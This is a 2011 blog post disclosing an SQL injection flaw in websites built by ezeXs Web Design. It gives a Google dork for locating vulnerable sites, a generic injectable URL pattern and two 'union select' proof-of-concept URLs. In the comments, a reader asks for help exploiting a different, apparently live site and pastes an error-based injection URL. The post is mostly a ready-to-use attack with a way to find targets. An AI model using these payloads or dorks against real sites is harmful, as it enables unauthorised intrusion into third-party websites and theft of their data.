ezeXs Web Design Vulnerable to SQL Injection ~ Random stuff by yappare

Friday, April 15, 2011

ezeXs Web Design Vulnerable to SQL Injection

on April 15, 2011 1 comment

Title : ezeXs Web Design Vulnerable to SQL Injection
Web : http://www.ezexs.com/
By : p0pc0rn
Dork : intext:"Powered by ezexs.com"

Microsoft Access SQL Injection
------------------------------

http://site.com/[type].asp?[id]=[SQL]

Notes : All parameters are possible to be injected.

POC
---

http://site.com/product_detail.asp?Id=57 union select 1 from test.a
http://site.com/category.asp?Id=49 union select 1 from test.a

more out there.

thanks,
-p0pc0rn-

fahadl-alharbi said...: thanks man bt i can't exploit look

http://www.bjkdost.org/veri/haber/devam.asp?haber_id=569%201%20or%201=convert%28int,%28db_name%29%29--

please sow explain exploit the site :(

:$; April 20, 2011 at 5:47 AM

Random stuff by yappare

Friday, April 15, 2011

ezeXs Web Design Vulnerable to SQL Injection

1 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories